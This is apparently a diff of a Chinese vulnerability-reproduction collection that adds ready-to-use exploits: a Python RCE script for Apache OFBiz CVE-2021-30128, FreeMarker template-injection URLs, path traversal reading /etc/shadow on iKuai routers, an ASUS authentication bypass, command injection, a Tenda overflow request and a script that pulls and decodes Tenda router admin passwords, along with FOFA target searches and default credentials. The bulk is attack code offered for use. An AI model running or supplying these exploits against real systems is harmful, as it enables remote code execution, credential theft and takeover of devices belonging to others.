<map-Key> <cus-obj>ACED0005 ... ... 871007E000D78</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
```
exp:
```py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/3/24-15:09
"""
import subprocess
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-30128 Powered by r0cky
===================================================
""")
def bypass(payload):
className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl']
for cn in className:
len_hex = hex(len(cn)).replace('0x','').upper()
className_hex = cn.encode().hex().upper()
bypass_className = cn + '<java' + cn[cn.rfind('.'):]
bypass_len_hex = hex(len(bypass_className)).replace('0x','').upper()
bypass_className_hex = bypass_className.encode().hex().upper()
payload = payload.replace(len_hex + className_hex, bypass_len_hex + bypass_className_hex)
return payload
def exp(url, cmd):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "CommonsBeanutils1", cmd], stdout=subprocess.PIPE)
payload = popen.stdout.read()
if len(payload) == 0:
print("请在当前脚本目录放置ysoserial.jar!")
exit(-1)
payload = payload.hex().upper()
post_data = bypass(payload)
print("[+] Payload:", post_data)
data = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{}</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
""".format(post_data)
print("[+] payload sending...")
r = requests.post(url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] send payload success.")
print()
print("[END] Apache OFBiz RCE Done.")
else:
print("[-] send payload failed.")
print()
print("[END] Apache OFBiz RCE failed.")
headers={"Content-Type": "text/xml"}
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
# target = "https://192.168.80.136:8443"
# vps_ip = "10.20.28.16"
# vps_port = "9999"
url = "{}/webtools/control/SOAPService".format(target)
exp(url, cmd)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
```


@ -0,0 +1,34 @@
# Apache OfBiz 服务器端模板注入 SSTI
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
## 漏洞影响
```
Apache OfBiz 17.12.01
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
服务器端模板注入 renderLookupField
从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
poc
```
https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
```


@ -0,0 +1,24 @@
# Apache OfBiz 远程代码执行 RCE
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO
```


@ -0,0 +1,38 @@
# iKuai 后台任意文件读取漏洞
## 漏洞描述
参考链接:
- https://forum.ywhack.com/thread-115307-1-8.html
## 影响版本
影响版本,不一定是绝对版本,也可能其它版本都存在:
```
3.2.8 x64 Build201910101758
```
## FOFA
```
title="登录爱快流控路由"
```
## 漏洞复现
默认用户名/密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```



@ -0,0 +1,44 @@
# 华硕 GT-AC2900 身份验证绕过 CVE-2021-32030
## 漏洞描述
ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时容易受到身份验证绕过漏洞的攻击从而导致对管理员界面的未经授权的访问。
参考链接:
- https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
## 漏洞影响
```
ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)
ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)
```
## 漏洞复现
通过在auth_check添加空字符进行绕过身份验证。
poc
```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0
HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close
{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```


@ -1,8 +1,8 @@
# 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞
# 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793
## 漏洞描述
启明星辰 天清汉⻢USG防⽕墙 存在逻辑缺陷漏洞,攻击者通过账号密码可以进入后台后更改任意用户权限升级为管理员
启明星辰 天清汉⻢USG防⽕墙 存在逻辑缺陷漏洞,攻击者通过账号密码可以进入后台后更改任意用户权限升级为管理员
## 漏洞影响


@ -0,0 +1,30 @@
# 碧海威 L7多款产品 后台命令执行漏洞
## 漏洞描述
碧海威 L7多款产品存在 后台命令执行漏洞,攻击者通过账号密码登录后台后,通过命令拼接造成命令注入。
## 漏洞影响
```
碧海威 L7多款产品
```
## 漏洞复现
登陆页面如下:
![碧海威 L7多款产品 后台命令执行漏洞](images/6-1620745283.png)
默认密码为 `adimn/admin or admin123`
漏洞存在于 命令控制台中,其中存在命令注入
![碧海威 L7多款产品 后台命令执行漏洞](images/2-1620745285.png)
可以使用 help & sh 得到交互式命令写入恶意文件
```
help&cat /etc/passwd
```


@ -0,0 +1,30 @@
# 腾达路由器 AC11 堆栈缓冲区溢出 CVE-2021-31758
## 漏洞描述
在固件为02.03.01.104_CN的Tenda AC11设备上发现了一个问题。/goform/setportList 中的堆栈缓冲区溢出漏洞使攻击者可以通过精心设计的post请求在系统上执行任意代码。
参考链接:
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_2
## 漏洞复现
poc
```
POST /goform/setportList HTTP/1.1
Host: 192.168.0.1
Content-Length: 717
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded;
Accept: */*
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&portList=1234aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
```


@ -0,0 +1,170 @@
# 腾达路由器 D151/D31未经身份验证的配置下载
## 漏洞描述
攻击者可利用此漏洞,通过请求{IP}/goform/getimage即可下载当前路由器配置包括管理员登录名也可以通过请求激活telnet服务/goform/telnet默认情况下该服务已启用
## 漏洞影响
```
D301 1.2.11.2_EN
D301 V2.0 50.22.1.8_EN
D151 V2.0 50.21.1.5_EN
```
## 漏洞复现
poc
```python
import struct
import itertools
import random, sys
import requests
import base64
FETCH_CODE = "\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z"
ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'}
CLEAR_CODE = 256
END_OF_CODE = CLEAR_CODE + 1
MIN_WIDTH = 8
DEFAULT_MIN_BITS = MIN_WIDTH + 1
DEFAULT_MAX_BITS = 12
def cmsDecoder(compressed_cfg):
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dict[CLEAR_CODE] = CLEAR_CODE
_cp_dict[END_OF_CODE] = END_OF_CODE
prefix, offset, ignore = None, 0, 0
codepoints_arr, remainder, bits = [], [], []
init_csize = len(_cp_dict)
codesize = init_csize
minwidth = MIN_WIDTH
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
pointwidth = minwidth
buts_arr = []
for b in compressed_cfg:
value = struct.unpack("B", b)[0]
for bitplusone in range(8, 0, -1):
bitindex = bitplusone - 1
buts_arr.append(1 & (value >> bitindex))
for nextbit in buts_arr:
offset = (offset + 1) % 8
if ignore > 0:
ignore = ignore - 1
continue
bits.append(nextbit)
if len(bits) == pointwidth:
cp_int = 0
lsb_first = [b for b in bits]
lsb_first.reverse()
for bit_index in range(len(lsb_first)):
if lsb_first[bit_index]:
cp_int = cp_int | (1 << bit_index)
bits = []
codepoints_arr.append(cp_int)
codesize = codesize + 1
if cp_int in [CLEAR_CODE, END_OF_CODE]:
codesize = init_csize
pointwidth = minwidth
else:
while codesize >= (2 ** pointwidth):
pointwidth = pointwidth + 1
if cp_int == END_OF_CODE:
ignore = (8 - offset) % 8
decodedBytes = []
for cp_int in codepoints_arr:
suffix = ""
if cp_int == CLEAR_CODE:
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dict[CLEAR_CODE] = CLEAR_CODE
_cp_dict[END_OF_CODE] = END_OF_CODE
prefix = None
elif cp_int != END_OF_CODE:
if cp_int in _cp_dict:
suffix = _cp_dict[cp_int]
if None != prefix:
_cp_dict[len(_cp_dict)] = prefix + suffix[0]
else:
suffix = prefix + prefix[0]
_cp_dict[len(_cp_dict)] = suffix
prefix = suffix
decoded = suffix
for char in decoded:
decodedBytes.append(char)
return decodedBytes
def exploit(ip):
print "[!] Downloading config"
try:
r = requests.get("http://{}/goform/getimage".format(ip))
pass
except:
print "[-] Failed to download the config, the target may not be vulnerable"
BIN_CONTENT = r.content
BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50]
CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT))
USER_, PASS_ = "", ""
for i in ADMIN_LOG_CFG.keys():
if i in CONFIG_XML:
CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]
PASS_ = CONFIG_XML[:CONFIG_XML.index('</')]
USER_ = ADMIN_LOG_CFG[i]
print "\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip('\x00'))
return 0
print "[-] Failed to decode the config file\n"
return -1
if len(sys.argv) == 1:
print "usage: python2 " + sys.argv[0] + " router_ip"
print "example: python2 exploit.py http://192.168.1.1"
exit()
if __name__ == "__main__":
print """\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -- By BenCh@li@h
| D _]/\ \ -- BenChaliah@github
\___/ / /\ \\
(_ )( _)
"""
try:
exploit(sys.argv[1])
except Exception as e:
print str(e)
```
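Review bot: The poc listing is Python 2 only (`print` statements throughout, and the usage lines themselves say `python2`), but the fence is tagged plain `python` and nothing in the surrounding text says so, which misleads anyone reading it as a reference. Suggest changing the intro line to `poc（Python 2）` so the interpreter requirement is visible without reading the code. The listing's indentation also appears flattened in this view (the `cmsDecoder` and `exploit` bodies sit at column 0); this may be a display artefact, but the committed file is worth checking.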


@ -1,4 +1,4 @@
# 锐捷 Smartweb管理系统 密码信息泄露漏洞
# 锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369
## 漏洞描述